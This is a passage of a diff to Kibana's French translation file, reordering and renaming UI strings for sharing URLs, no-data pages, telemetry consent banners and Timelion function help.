 "share.urlPanel.savedObjectLabel": "Objet enregistré",
- "share.urlPanel.shortUrlHelpText": "Nous vous recommandons de partager des URL de snapshot raccourcies pour une compatibilité maximale. 
Internet Explorer présente des restrictions de longueur d'URL et certains analyseurs de wiki et de balisage ne fonctionnent pas bien avec les URL de snapshot longues, mais les URL courtes devraient bien fonctionner.",
+ "share.urlPanel.shortUrlHelpText": "Nous vous recommandons de partager des URL de snapshot raccourcies pour une compatibilité maximale. Internet Explorer présente des restrictions de longueur d'URL et certains analyseurs de wiki et de balisage ne fonctionnent pas bien avec les URL de snapshot longues, mais les URL courtes devraient bien fonctionner.",
 "share.urlPanel.shortUrlLabel": "URL courte",
- "share.urlPanel.snapshotDescription": "Les URL de snapshot encodent l'état actuel de {objectType} dans l'URL elle-même. Les modifications apportées au {objectType} enregistré ne seront pas visibles via cette URL.",
 "share.urlPanel.snapshotLabel": "Snapshot",
- "share.urlPanel.unableCreateShortUrlErrorMessage": "Impossible de créer une URL courte. Erreur : {errorMessage}.",
 "share.urlPanel.urlGroupTitle": "URL",
 "share.urlService.redirect.components.Error.title": "Erreur de redirection",
 "share.urlService.redirect.components.Spinner.label": "Redirection…",
 "share.urlService.redirect.RedirectManager.invalidParamParams": "Impossible d'analyser les paramètres du localisateur. Les paramètres du localisateur doivent être sérialisés en tant que JSON et définis au paramètre de recherche d'URL \"p\".",
- "share.urlService.redirect.RedirectManager.locatorNotFound": "Le localisateur [ID = {id}] n'existe pas.",
- "share.urlService.redirect.RedirectManager.missingParamLocator": "ID du localisateur non spécifié. Spécifiez le paramètre de recherche \"l\" dans l'URL ; ce devrait être un ID de localisateur existant.",
- "share.urlService.redirect.RedirectManager.missingParamParams": "Paramètres du localisateur non spécifiés. 
Spécifiez le paramètre de recherche \"p\" dans l'URL ; ce devrait être un objet sérialisé JSON des paramètres du localisateur.",
- "share.urlService.redirect.RedirectManager.missingParamVersion": "Version des paramètres du localisateur non spécifiée. Spécifiez le paramètre de recherche \"v\" dans l'URL ; ce devrait être la version de Kibana au moment de la génération des paramètres du localisateur.",
- "sharedUXComponents.noDataPage.intro": "Ajoutez vos données pour commencer, ou {link} sur {solution}.",
- "sharedUXComponents.noDataPage.intro.link": "en savoir plus",
- "sharedUXComponents.noDataPage.welcomeTitle": "Bienvenue dans Elastic {solution}.",
- "sharedUXPackages.solutionNav.collapsibleLabel": "Réduire la navigation latérale",
- "sharedUXPackages.solutionNav.menuText": "menu",
+ "share.urlService.redirect.RedirectManager.missingParamLocator": "ID du localisateur non spécifié. Spécifiez le paramètre de recherche \"l\" dans l'URL ; ce devrait être un ID de localisateur existant.",
+ "share.urlService.redirect.RedirectManager.missingParamParams": "Paramètres du localisateur non spécifiés. Spécifiez le paramètre de recherche \"p\" dans l'URL ; ce devrait être un objet sérialisé JSON des paramètres du localisateur.",
+ "share.urlService.redirect.RedirectManager.missingParamVersion": "Version des paramètres du localisateur non spécifiée. 
Spécifiez le paramètre de recherche \"v\" dans l'URL ; ce devrait être la version de Kibana au moment de la génération des paramètres du localisateur.",
+ "sharedUXPackages.noDataPage.intro": "Ajoutez vos données pour commencer, ou {link} sur {solution}.",
+ "sharedUXPackages.noDataPage.welcomeTitle": "Bienvenue dans Elastic {solution}.",
+ "sharedUXPackages.noDataPage.intro.link": "en savoir plus",
 "sharedUXPackages.solutionNav.mobileTitleText": "{solutionName} {menuText}",
- "sharedUXPackages.solutionNav.openLabel": "Ouvrir la navigation latérale",
+ "sharedUXPackages.buttonToolbar.buttons.addFromLibrary.libraryButtonLabel": "Ajouter depuis la bibliothèque",
+ "sharedUXPackages.card.noData.description": "Utilisez Elastic Agent pour collecter de manière simple et unifiée les données de vos machines.",
+ "sharedUXPackages.card.noData.noPermission.description": "Cette intégration n'est pas encore activée. Votre administrateur possède les autorisations requises pour l'activer.",
+ "sharedUXPackages.card.noData.noPermission.title": "Contactez votre administrateur",
+ "sharedUXPackages.card.noData.title": "Ajouter Elastic Agent",
 "sharedUXPackages.exitFullScreenButton.exitFullScreenModeButtonText": "Quitter le plein écran",
 "sharedUXPackages.exitFullScreenButton.fullScreenModeDescription": "En mode Plein écran, appuyez sur Échap pour quitter.",
- "sharedUXPackages.noDataConfig.addIntegrationsDescription": "Utilisez Elastic Agent pour collecter des données et créer des solutions Analytics.",
+ "sharedUXPackages.noDataConfig.addIntegrationsDescription": "Utilisez Elastic Agent pour collecter des données et créer des solutions Analytics.",
 "sharedUXPackages.noDataConfig.addIntegrationsTitle": "Ajouter des intégrations",
 "sharedUXPackages.noDataConfig.analytics": "Analyse",
- "sharedUXPackages.noDataConfig.analyticsPageTitle": "Bienvenue dans Analytics !",
+ "sharedUXPackages.noDataConfig.analyticsPageTitle": "Bienvenue dans Analytics !",
 "sharedUXPackages.noDataViewsPrompt.addDataViewText": "Créer une vue de données",
 "sharedUXPackages.noDataViewsPrompt.dataViewExplanation": "Les vues de données identifient les données Elasticsearch que vous souhaitez explorer. Vous pouvez faire pointer des vues de données vers un ou plusieurs flux de données, index et alias d'index, tels que vos données de log d'hier, ou vers tous les index contenant vos données de log.",
- "sharedUXPackages.noDataViewsPrompt.learnMore": "Envie d'en savoir plus ?",
+ "sharedUXPackages.noDataViewsPrompt.learnMore": "Envie d'en savoir plus ?",
 "sharedUXPackages.noDataViewsPrompt.noPermission.dataViewExplanation": "Les vues de données identifient les données Elasticsearch que vous souhaitez explorer. Pour créer des vues de données, demandez les autorisations requises à votre administrateur.",
 "sharedUXPackages.noDataViewsPrompt.noPermission.title": "Vous devez disposer d'une autorisation pour pouvoir créer des vues de données",
 "sharedUXPackages.noDataViewsPrompt.nowCreate": "Créez à présent une vue de données.",
 "sharedUXPackages.noDataViewsPrompt.readDocumentation": "Lisez les documents",
 "sharedUXPackages.noDataViewsPrompt.youHaveData": "Vous avez des données dans Elasticsearch.",
+ "sharedUXPackages.solutionNav.collapsibleLabel": "Réduire la navigation latérale",
+ "sharedUXPackages.solutionNav.menuText": "menu",
+ "sharedUXPackages.solutionNav.openLabel": "Ouvrir la navigation latérale",
 "telemetry.callout.appliesSettingTitle": "Les modifications apportées à ce paramètre s'appliquent dans {allOfKibanaText} et sont enregistrées automatiquement.",
+ "telemetry.seeExampleOfClusterDataAndEndpointSecuity": "Découvrez des exemples de {clusterData} et de {securityData} que nous collectons.",
+ "telemetry.telemetryBannerDescription": "Vous souhaitez nous aider à améliorer la Suite Elastic ? La collecte de données d'utilisation est actuellement désactivée. 
En activant la collecte de données d'utilisation, vous nous aidez à gérer et à améliorer nos produits et nos services. Consultez notre {privacyStatementLink} pour plus d'informations.",
+ "telemetry.telemetryConfigAndLinkDescription": "En activant la collecte de données d'utilisation, vous nous aidez à gérer et à améliorer nos produits et nos services. Consultez notre {privacyStatementLink} pour plus d'informations.",
+ "telemetry.telemetryOptedInNoticeDescription": "Pour en savoir plus sur la manière dont les données d'utilisation nous aident à gérer et à améliorer nos produits et nos services, consultez notre {privacyStatementLink}. Pour mettre fin à la collecte, {disableLink}.",
 "telemetry.callout.appliesSettingTitle.allOfKibanaText": "tout Kibana",
 "telemetry.callout.clusterStatisticsDescription": "Voici un exemple des statistiques de cluster de base que nous collecterons. Cela comprend le nombre d'index, de partitions et de nœuds. Cela comprend également des statistiques d'utilisation de niveau élevé, comme l'état d'activation du monitoring.",
 "telemetry.callout.clusterStatisticsTitle": "Statistiques du cluster",
@@ -5576,20 +4701,48 @@
 "telemetry.provideUsageDataTitle": "Fournir les données d'utilisation",
 "telemetry.readOurUsageDataPrivacyStatementLinkText": "Déclaration de confidentialité",
 "telemetry.securityData": "données de sécurité",
- "telemetry.seeExampleOfClusterDataAndEndpointSecuity": "Découvrez des exemples de {clusterData} et de {securityData} que nous collectons.",
- "telemetry.telemetryBannerDescription": "Vous souhaitez nous aider à améliorer la Suite Elastic ? La collecte de données d'utilisation est actuellement désactivée. En activant la collecte de données d'utilisation, vous nous aidez à gérer et à améliorer nos produits et nos services. Consultez notre {privacyStatementLink} pour plus d'informations.",
- "telemetry.telemetryConfigAndLinkDescription": "En activant la collecte de données d'utilisation, vous nous aidez à gérer et à améliorer nos produits et nos services. Consultez notre {privacyStatementLink} pour plus d'informations.",
 "telemetry.telemetryOptedInDisableUsage": "désactivez les données d'utilisation ici",
 "telemetry.telemetryOptedInDismissMessage": "Rejeter",
- "telemetry.telemetryOptedInNoticeDescription": "Pour en savoir plus sur la manière dont les données d'utilisation nous aident à gérer et à améliorer nos produits et nos services, consultez notre {privacyStatementLink}. Pour mettre fin à la collecte, {disableLink}.",
- "telemetry.telemetryOptedInNoticeTitle": "Aidez-nous à améliorer la Suite Elastic.",
+ "telemetry.telemetryOptedInNoticeTitle": "Aidez-nous à améliorer la Suite Elastic.",
 "telemetry.telemetryOptedInPrivacyStatement": "Déclaration de confidentialité",
 "telemetry.usageDataTitle": "Données d'utilisation",
 "telemetry.welcomeBanner.disableButtonLabel": "Désactiver",
 "telemetry.welcomeBanner.enableButtonLabel": "Activer",
 "telemetry.welcomeBanner.telemetryConfigDetailsDescription.telemetryPrivacyStatementLinkText": "Déclaration de confidentialité",
- "telemetry.welcomeBanner.title": "Aidez-nous à améliorer la Suite Elastic.",
- "timelion.emptyExpressionErrorMessage": "Erreur Timelion : aucune expression fournie",
+ "telemetry.welcomeBanner.title": "Aidez-nous à améliorer la Suite Elastic.",
+ "timelion.help.functions.aggregate.args.functionHelpText": "L'une des options suivantes : {functions}.",
+ "timelion.help.functions.aggregateHelpText": "Crée une ligne statique sur la base du résultat du traitement de tous les points de la série. Fonctions disponibles : {functions}",
+ "timelion.help.functions.common.args.fitHelpText": "Algorithme à utiliser pour adapter les séries à l'intervalle et à la période cible. Disponible : {fitFunctions}",
+ "timelion.help.functions.es.args.splitHelpText": "Un champ Elasticsearch avec lequel diviser la série et une limite. Par ex. \"{hostnameSplitArg}\" pour obtenir les 10 premiers noms d'hôte.",
+ "timelion.help.functions.fit.args.modeHelpText": "L'algorithme à utiliser pour adapter les séries à la cible. L'une des options suivantes : {fitFunctions}.",
+ "timelion.help.functions.legend.args.timeFormatHelpText": "Modèle de format moment.js. Par défaut : {defaultTimeFormat}",
+ "timelion.help.functions.movingaverage.args.positionHelpText": "Position des points moyens par rapport à l'heure du résultat. L'une des options suivantes : {validPositions}.",
+ "timelion.help.functions.movingstd.args.positionHelpText": "Position de la section de la fenêtre par rapport à l'heure du résultat. Les options sont {positions}. Par défaut : {defaultPosition}.",
+ "timelion.help.functions.points.args.symbolHelpText": "symbole de point. L'une des options suivantes : {validSymbols}",
+ "timelion.help.functions.propsHelpText": "À utiliser à vos risques et périls ; définit des propriétés arbitraires sur la série. Par exemple : {example}",
+ "timelion.help.functions.trend.args.modeHelpText": "L'algorithme à utiliser pour générer la courbe de tendance. L'une des options suivantes : {validRegressions}.",
+ "timelion.help.functions.worldbank.args.codeHelpText": "Chemin de l'API Worldbank (Banque mondiale). Il s'agit généralement de tout ce qui suit le domaine, avant la chaîne de requête. Par exemple : {apiPathExample}.",
+ "timelion.help.functions.worldbankHelpText": "\n [expérimental]\n Extrayez des données de {worldbankUrl} à l'aide du chemin d’accès aux séries.\n La Banque mondiale fournit surtout des données annuelles et n'a souvent aucune donnée pour l'année en cours.\n Essayez {offsetQuery} si vous n’obtenez pas de données pour les plages temporelles récentes.",
+ "timelion.help.functions.worldbankIndicators.args.indicatorHelpText": "Le code d'indicateur à utiliser. Vous devrez le rechercher sur {worldbankUrl}. Souvent très complexe. Par exemple, {indicatorExample} correspond à la population.",
+ "timelion.help.functions.worldbankIndicatorsHelpText": "\n [expérimental]\n Extrayez des données de {worldbankUrl} à l'aide du nom et de l'indicateur du pays. La Banque mondiale fournit\n surtout des données annuelles et n'a souvent aucune donnée pour l'année en cours. Essayez {offsetQuery} si vous n’obtenez pas de données pour\n les plages temporelles récentes.",
+ "timelion.help.functions.yaxis.args.unitsHelpText": "La fonction à utiliser pour mettre en forme les étiquettes de l'axe Y. L'une des options suivantes : {formatters}.",
+ "timelion.noFunctionErrorMessage": "Fonction inconnue : {name}",
+ "timelion.serverSideErrors.argumentsOverflowErrorMessage": "Trop d'arguments transmis à : {functionName}",
+ "timelion.serverSideErrors.bucketsOverflowErrorMessage": "Nombre max. de compartiments dépassé : {bucketCount} sur {maxBuckets} autorisés. Sélectionnez un intervalle plus grand ou une période plus courte.",
+ "timelion.serverSideErrors.errorInCell": " dans la cellule n{number} : {message}",
+ "timelion.serverSideErrors.esFunction.indexNotFoundErrorMessage": "Index Elasticsearch introuvable : {index}",
+ "timelion.serverSideErrors.movingaverageFunction.notValidPositionErrorMessage": "Les positions valides sont : {validPositions}.",
+ "timelion.serverSideErrors.movingstdFunction.notValidPositionErrorMessage": "Les positions valides sont : {validPositions}.",
+ "timelion.serverSideErrors.pointsFunction.notValidSymbolErrorMessage": "Les symboles valides sont : {validSymbols}.",
+ "timelion.serverSideErrors.sheetParseErrorMessage": "Attendu : {expectedDescription} au caractère {column}",
+ "timelion.serverSideErrors.unknownArgumentErrorMessage": "Argument inconnu pour {functionName} : {argumentName}",
+ "timelion.serverSideErrors.unknownArgumentTypeErrorMessage": "Type d'argument non pris en charge : {argument}",
+ "timelion.serverSideErrors.worldbankFunction.noDataErrorMessage": "La requête à la Banque mondiale a réussi, mais il n'y a pas de données pour {code}.",
+ "timelion.serverSideErrors.wrongFunctionArgumentTypeErrorMessage": "{functionName}({argumentName}) doit être l'une des options suivantes : {requiredTypes}. Obtenu : {actualType}",
+ "timelion.serverSideErrors.yaxisFunction.notSupportedUnitTypeErrorMessage": "{units} n'est pas un type d'unité pris en charge.",
+ "timelion.uiSettings.defaultIndexDescription": "Index Elasticsearch par défaut dans lequel rechercher avec {esParam}",
+ "timelion.uiSettings.timeFieldDescription": "Champ par défaut contenant un horodatage lors de l'utilisation de {esParam}",
+ "timelion.emptyExpressionErrorMessage": "Erreur Timelion : aucune expression fournie",
 "timelion.expressionSuggestions.argument.description.acceptsText": "Accepte",
 "timelion.expressionSuggestions.func.description.chainableHelpText": "Enchaînable",
 "timelion.expressionSuggestions.func.description.dataSourceHelpText": "Source de données",
@@ -5597,15 +4750,12 @@
 "timelion.function.args.ariaLabelHelpText": "Spécifie l'attribut aria-label du timelion",
 "timelion.function.help": "Visualisation Timelion",
 "timelion.help.functions.absHelpText": "Renvoyer la valeur absolue de chaque valeur dans la liste des séries",
- "timelion.help.functions.aggregate.args.functionHelpText": "L'une des options suivantes : {functions}.",
- "timelion.help.functions.aggregateHelpText": "Crée une ligne statique sur la base du résultat du traitement de tous les points de la série. Fonctions disponibles : {functions}",
 "timelion.help.functions.bars.args.stackHelpText": "Vrai par défaut si les barres sont empilées",
 "timelion.help.functions.bars.args.widthHelpText": "Largeur des barres en pixels",
 "timelion.help.functions.barsHelpText": "Afficher la liste des séries sous la forme de barres",
- "timelion.help.functions.color.args.colorHelpText": "Couleur des séries en valeurs hexadécimales, par ex. #c6c6c6 est un très joli gris clair. Si vous spécifiez plusieurs couleurs et que vous avez plusieurs séries, vous obtiendrez un dégradé, par ex. \"#00B1CC:#00FF94:#FF3A39:#CC1A6F\".",
+ "timelion.help.functions.color.args.colorHelpText": "Couleur des séries en valeurs hexadécimales, par ex. #c6c6c6 est un très joli gris clair. Si vous spécifiez plusieurs couleurs et que vous avez plusieurs séries, vous obtiendrez un dégradé, par ex. \"#00B1CC:#00FF94:#FF3A39:#CC1A6F\".",
 "timelion.help.functions.colorHelpText": "Changer la couleur des séries",
- "timelion.help.functions.common.args.fitHelpText": "Algorithme à utiliser pour adapter les séries à l'intervalle et à la période cible. Disponible : {fitFunctions}",
- "timelion.help.functions.common.args.offsetHelpText": "Décalez la récupération des séries avec une expression de date, par ex. -1M pour afficher les événements d'il y a un mois comme s'ils se produisaient maintenant. Décalez les séries par rapport à la plage temporelle globale des graphiques en utilisant la valeur \"timerange\", par ex. \"timerange:-2\" pour obtenir un décalage correspondant à deux fois la plage temporelle globale du graphique dans le passé.",
+ "timelion.help.functions.common.args.offsetHelpText": "Décalez la récupération des séries avec une expression de date, par ex. -1M pour afficher les événements d'il y a un mois comme s'ils se produisaient maintenant. Décalez les séries par rapport à la plage temporelle globale des graphiques en utilisant la valeur \"timerange\", par ex. \"timerange:-2\" pour obtenir un décalage correspondant à deux fois la plage temporelle globale du graphique dans le passé.",
 "timelion.help.functions.condition.args.elseHelpText": "La valeur à laquelle le point sera défini si la comparaison est fausse. Si vous spécifiez une liste de séries, la première série sera utilisée.",
 "timelion.help.functions.condition.args.ifHelpText": "La valeur à laquelle le point sera comparé. Si vous spécifiez une liste de séries, la première série sera utilisée.",
 "timelion.help.functions.condition.args.operator.suggestions.eqHelpText": "égal",
@@ -5614,7 +4764,7 @@
 "timelion.help.functions.condition.args.operator.suggestions.lteHelpText": "inférieur ou égal",
 "timelion.help.functions.condition.args.operator.suggestions.ltHelpText": "inférieur à",
 "timelion.help.functions.condition.args.operator.suggestions.neHelpText": "différent",
- "timelion.help.functions.condition.args.operatorHelpText": "Opérateur de comparaison à utiliser pour la comparaison ; les opérateurs valides sont eq (égal), ne (différent), lt (inférieur à), lte (inférieur ou égal), gt (supérieur à), gte (supérieur ou égal).",
+ "timelion.help.functions.condition.args.operatorHelpText": "Opérateur de comparaison à utiliser pour la comparaison ; les opérateurs valides sont eq (égal), ne (différent), lt (inférieur à), lte (inférieur ou égal), gt (supérieur à), gte (supérieur ou égal).",
 "timelion.help.functions.condition.args.thenHelpText": "La valeur à laquelle le point sera défini si la comparaison est vraie. Si vous spécifiez une liste de séries, la première série sera utilisée.",
 "timelion.help.functions.conditionHelpText": "Compare chaque point à un nombre ou au même point dans une autre série à l'aide d'un opérateur, puis définit sa valeur sur le résultat si la condition est vraie, avec un sinon facultatif.",
 "timelion.help.functions.cusum.args.baseHelpText": "Numéro auquel commencer. Cela ajoute simplement ce numéro au début de la série",
@@ -5625,23 +4775,21 @@
 "timelion.help.functions.es.args.indexHelpText": "Index à interroger, caractères génériques acceptés. Fournissez le nom du modèle d'indexation pour les champs scriptés et le type de nom de champ devant les suggestions pour les arguments metrics, split et timefield.",
 "timelion.help.functions.es.args.intervalHelpText": "**NE PAS UTILISER**. C'est amusant pour déboguer les fonctions fit, mais vous devriez vraiment utiliser le sélecteur d'intervalle.",
 "timelion.help.functions.es.args.kibanaHelpText": "Respectez les filtres des tableaux de bord Kibana. Cela n'a d'effet qu’en cas d'utilisation dans des tableaux de bord Kibana",
- "timelion.help.functions.es.args.metricHelpText": "Une agrégation d'indicateurs Elasticsearch Moyenne, Somme, Min, Max, Centiles ou Cardinalité, puis un champ. Par ex. \"sum:bytes\", \"percentiles:bytes:95,99,99.9\" ou simplement \"count\".",
+ "timelion.help.functions.es.args.metricHelpText": "Une agrégation d'indicateurs Elasticsearch Moyenne, Somme, Min, Max, Centiles ou Cardinalité, puis un champ. Par ex. \"sum:bytes\", \"percentiles:bytes:95,99,99.9\" ou simplement \"count\".",
 "timelion.help.functions.es.args.qHelpText": "Requête dans la syntaxe de chaîne de requête Lucene",
- "timelion.help.functions.es.args.splitHelpText": "Un champ Elasticsearch avec lequel diviser la série et une limite. Par ex. \"{hostnameSplitArg}\" pour obtenir les 10 premiers noms d'hôte.",
- "timelion.help.functions.es.args.timefieldHelpText": "Champ de type \"date\" à utiliser pour l'axe X",
+ "timelion.help.functions.es.args.timefieldHelpText": "Champ de type \"date\" à utiliser pour l'axe X",
 "timelion.help.functions.esHelpText": "Extraire des données d'une instance Elasticsearch",
 "timelion.help.functions.firstHelpText": "Il s'agit d'une fonction interne qui renvoie simplement la liste de séries d'entrée. Ne l'utilisez pas.",
- "timelion.help.functions.fit.args.modeHelpText": "L'algorithme à utiliser pour adapter les séries à la cible. L'une des options suivantes : {fitFunctions}.",
 "timelion.help.functions.fitHelpText": "Remplit les valeurs nulles à l'aide d'une fonction fit définie.",
 "timelion.help.functions.hide.args.hideHelpText": "Masquer ou afficher les séries",
 "timelion.help.functions.hideHelpText": "Masquer les séries par défaut",
- "timelion.help.functions.holt.args.alphaHelpText": "\n Pondération de lissage de 0 à 1.\n Augmentez l’alpha pour que la nouvelle série suive de plus près l'originale.\n Diminuez-le pour rendre la série plus lisse.",
- "timelion.help.functions.holt.args.betaHelpText": "\n Pondération de tendance de 0 à 1.\n Augmentez le bêta pour que les lignes montantes/descendantes continuent à monter/descendre plus longtemps.\n Diminuez-le pour que la fonction apprenne plus rapidement la nouvelle tendance.",
- "timelion.help.functions.holt.args.gammaHelpText": "\n Pondération saisonnière de 0 à 1. Vos données ressemblent-elles à une vague ?\n Augmentez cette valeur pour donner plus d'importance aux saisons récentes et ainsi modifier plus rapidement la forme de la vague.\n Diminuez-la pour réduire l'importance des nouvelles saisons et ainsi rendre l'historique plus important.\n ",
- "timelion.help.functions.holt.args.sampleHelpText": "\n Le nombre de saisons à échantillonner avant de commencer à \"prédire\" dans une série saisonnière.\n (Utile uniquement avec gamma, par défaut : all)",
- "timelion.help.functions.holt.args.seasonHelpText": "La longueur de la saison, par ex. 1w, si votre modèle se répète chaque semaine. (Utile uniquement avec gamma)",
+ "timelion.help.functions.holt.args.alphaHelpText": "\n Pondération de lissage de 0 à 1.\n Augmentez l’alpha pour que la nouvelle série suive de plus près l'originale.\n Diminuez-le pour rendre la série plus lisse.",
+ "timelion.help.functions.holt.args.betaHelpText": "\n Pondération de tendance de 0 à 1.\n Augmentez le bêta pour que les lignes montantes/descendantes continuent à monter/descendre plus longtemps.\n Diminuez-le pour que la fonction apprenne plus rapidement la nouvelle tendance.",
+ "timelion.help.functions.holt.args.gammaHelpText": "\n Pondération saisonnière de 0 à 1. Vos données ressemblent-elles à une vague ?\n Augmentez cette valeur pour donner plus d'importance aux saisons récentes et ainsi modifier plus rapidement la forme de la vague.\n Diminuez-la pour réduire l'importance des nouvelles saisons et ainsi rendre l'historique plus important.\n ",
+ "timelion.help.functions.holt.args.sampleHelpText": "\n Le nombre de saisons à échantillonner avant de commencer à \"prédire\" dans une série saisonnière.\n (Utile uniquement avec gamma, par défaut : all)",
+ "timelion.help.functions.holt.args.seasonHelpText": "La longueur de la saison, par ex. 1w, si votre modèle se répète chaque semaine. (Utile uniquement avec gamma)",
 "timelion.help.functions.holtHelpText": "\n Échantillonner le début d'une série et l'utiliser pour prévoir ce qui devrait se produire\n via plusieurs paramètres facultatifs. En règle générale, cela ne prédit pas\n l'avenir, mais ce qui devrait se produire maintenant en fonction des données passées,\n ce qui peut être utile pour la détection des anomalies. Notez que les valeurs null seront remplacées par des valeurs prévues.",
- "timelion.help.functions.label.args.labelHelpText": "Valeur de légende pour les séries. Vous pouvez utiliser $1, $2, etc. dans la chaîne pour correspondre aux groupes de captures d'expressions régulières.",
+ "timelion.help.functions.label.args.labelHelpText": "Valeur de légende pour les séries. Vous pouvez utiliser $1, $2, etc. dans la chaîne pour correspondre aux groupes de captures d'expressions régulières.",
 "timelion.help.functions.label.args.regexHelpText": "Une expression régulière compatible avec les groupes de captures",
 "timelion.help.functions.labelHelpText": "Modifiez l'étiquette des séries. Utiliser %s pour référencer l'étiquette existante",
 "timelion.help.functions.legend.args.columnsHelpText": "Nombre de colonnes à utiliser lors de la division de la légende",
@@ -5650,45 +4798,40 @@
 "timelion.help.functions.legend.args.position.suggestions.nwHelpText": "placer la légende dans le coin nord-ouest",
 "timelion.help.functions.legend.args.position.suggestions.seHelpText": "placer la légende dans le coin sud-est",
 "timelion.help.functions.legend.args.position.suggestions.swHelpText": "placer la légende dans le coin sud-ouest",
- "timelion.help.functions.legend.args.positionHelpText": "Coin dans lequel placer la légende : nw, ne, se ou sw. Il est également possible d'indiquer \"false\" pour désactiver la légende.",
- "timelion.help.functions.legend.args.showTimeHelpText": "Afficher la valeur temporelle en légende lors du passage du curseur sur le graphique. Par défaut : true.",
- "timelion.help.functions.legend.args.timeFormatHelpText": "Modèle de format moment.js. Par défaut : {defaultTimeFormat}",
+ "timelion.help.functions.legend.args.positionHelpText": "Coin dans lequel placer la légende : nw, ne, se ou sw. Il est également possible d'indiquer \"false\" pour désactiver la légende.",
+ "timelion.help.functions.legend.args.showTimeHelpText": "Afficher la valeur temporelle en légende lors du passage du curseur sur le graphique. Par défaut : true.",
 "timelion.help.functions.legendHelpText": "Définir la position et le style de la légende sur le tracé",
 "timelion.help.functions.lines.args.fillHelpText": "Nombre compris entre 0 et 10. À utiliser pour créer des graphiques en aires.",
 "timelion.help.functions.lines.args.showHelpText": "Afficher ou masquer les lignes",
 "timelion.help.functions.lines.args.stackHelpText": "Empiler les lignes, souvent équivoque. Utilisez au moins des remplissages si vous utilisez cette option.",
- "timelion.help.functions.lines.args.stepsHelpText": "Afficher la ligne comme une étape ; autrement dit, ne pas interpoler entre les points",
+ "timelion.help.functions.lines.args.stepsHelpText": "Afficher la ligne comme une étape ; autrement dit, ne pas interpoler entre les points",
 "timelion.help.functions.lines.args.widthHelpText": "Épaisseur de ligne",
 "timelion.help.functions.linesHelpText": "Afficher la liste de séries sous la forme de lignes",
- "timelion.help.functions.log.args.baseHelpText": "Définir la base logarithmique ; 10 par défaut",
- "timelion.help.functions.logHelpText": "Renvoyer la valeur logarithmique de chaque valeur de la liste des séries (base par défaut : 10)",
- "timelion.help.functions.max.args.valueHelpText": "Définit le point sur la valeur existante ou la valeur transmise, selon la plus élevée des deux. Si une liste de séries est transmise, elle doit contenir exactement 1 série.",
+ "timelion.help.functions.log.args.baseHelpText": "Définir la base logarithmique ; 10 par défaut",
+ "timelion.help.functions.logHelpText": "Renvoyer la valeur logarithmique de chaque valeur de la liste des séries (base par défaut : 10)",
+ "timelion.help.functions.max.args.valueHelpText": "Définit le point sur la valeur existante ou la valeur transmise, selon la plus élevée des deux. Si une liste de séries est transmise, elle doit contenir exactement 1 série.",
 "timelion.help.functions.maxHelpText": "Valeurs maximales d'une ou de plusieurs séries d'une liste de séries à chaque position, dans chaque série, de la liste de séries d'entrée.",
- "timelion.help.functions.min.args.valueHelpText": "Définit le point sur la valeur existante ou la valeur transmise, selon la plus basse des deux. Si une liste de séries est transmise, elle doit contenir exactement 1 série.",
+ "timelion.help.functions.min.args.valueHelpText": "Définit le point sur la valeur existante ou la valeur transmise, selon la plus basse des deux. Si une liste de séries est transmise, elle doit contenir exactement 1 série.",
 "timelion.help.functions.minHelpText": "Valeurs minimales d'une ou de plusieurs séries d'une liste de séries à chaque position, dans chaque série, de la liste de séries d'entrée.",
- "timelion.help.functions.movingaverage.args.positionHelpText": "Position des points moyens par rapport à l'heure du résultat. L'une des options suivantes : {validPositions}.",
 "timelion.help.functions.movingaverage.args.windowHelpText": "Nombre de points ou une expression mathématique de date (par ex. 1d, 1M) à utiliser pour calculer la moyenne. Si une expression mathématique de date est spécifiée, la fonction sera la plus proche possible compte tenu de l'intervalle sélectionné. Si l'expression mathématique de date n'est pas divisible uniformément par l'intervalle, les résultats peuvent sembler être anormaux.",
 "timelion.help.functions.movingaverageHelpText": "Calculez la moyenne mobile pour une fenêtre donnée. Idéal pour lisser les séries avec beaucoup de bruit.",
- "timelion.help.functions.movingstd.args.positionHelpText": "Position de la section de la fenêtre par rapport à l'heure du résultat. Les options sont {positions}. Par défaut : {defaultPosition}.",
 "timelion.help.functions.movingstd.args.windowHelpText": "Nombre de points à utiliser pour calculer l'écart-type.",
 "timelion.help.functions.movingstdHelpText": "Calculez l'écart-type mobile pour une fenêtre donnée. Utilise l'algorithme naïf en deux passes. Les erreurs d'arrondi peuvent devenir plus évidentes avec les séries très longues ou celles comportant de très grands nombres.",
 "timelion.help.functions.multiply.args.multiplierHelpText": "Nombre de séries par lequel multiplier. Une liste de plusieurs séries sera appliquée pour l'étiquette.",
 "timelion.help.functions.multiplyHelpText": "Multiplie les valeurs d'une ou de plusieurs séries d'une liste de séries à chaque position, dans chaque série, de la liste de séries d'entrée.",
 "timelion.help.functions.points.args.fillColorHelpText": "Couleur à utiliser pour remplir le point",
- "timelion.help.functions.points.args.fillHelpText": "Nombre compris entre 0 et 10 représentant l'opacité du remplissage",
+ "timelion.help.functions.points.args.fillHelpText": "Nombre compris entre 0 et 10 représentant l'opacité du remplissage",
 "timelion.help.functions.points.args.radiusHelpText": "Taille des points",
 "timelion.help.functions.points.args.showHelpText": "Afficher ou non les points",
- "timelion.help.functions.points.args.symbolHelpText": "symbole de point. L'une des options suivantes : {validSymbols}",
 "timelion.help.functions.points.args.weightHelpText": "Épaisseur de la ligne autour du point",
 "timelion.help.functions.pointsHelpText": "Afficher les séries sous la forme de points",
 "timelion.help.functions.precision.args.precisionHelpText": "Le nombre de chiffres à garder lors de la troncature de chaque valeur",
 "timelion.help.functions.precisionHelpText": "Le nombre de chiffres à garder lors de la troncature de la partie décimale de la valeur",
 "timelion.help.functions.props.args.globalHelpText": "Définir des propositions sur la liste de séries plutôt que sur chaque série",
- "timelion.help.functions.propsHelpText": "À utiliser à vos risques et périls ; définit des propriétés arbitraires sur la série. Par exemple : {example}",
 "timelion.help.functions.range.args.maxHelpText": "Nouvelle valeur maximale",
 "timelion.help.functions.range.args.minHelpText": "Nouvelle valeur minimale",
 "timelion.help.functions.rangeHelpText": "Modifie le maximum et le minimum d'une série sans changer la forme.",
- "timelion.help.functions.scaleInterval.args.intervalHelpText": "Le nouvel intervalle en notation mathématique de date, par ex. 1s pour 1 seconde. 1m, 5m, 1M, 1w, 1y, etc.",
+ "timelion.help.functions.scaleInterval.args.intervalHelpText": "Le nouvel intervalle en notation mathématique de date, par ex. 1s pour 1 seconde. 1m, 5m, 1M, 1w, 1y, etc.",
 "timelion.help.functions.scaleIntervalHelpText": "Scale une valeur (généralement une somme ou un décompte) à un nouvel intervalle. Par exemple, un taux par seconde.",
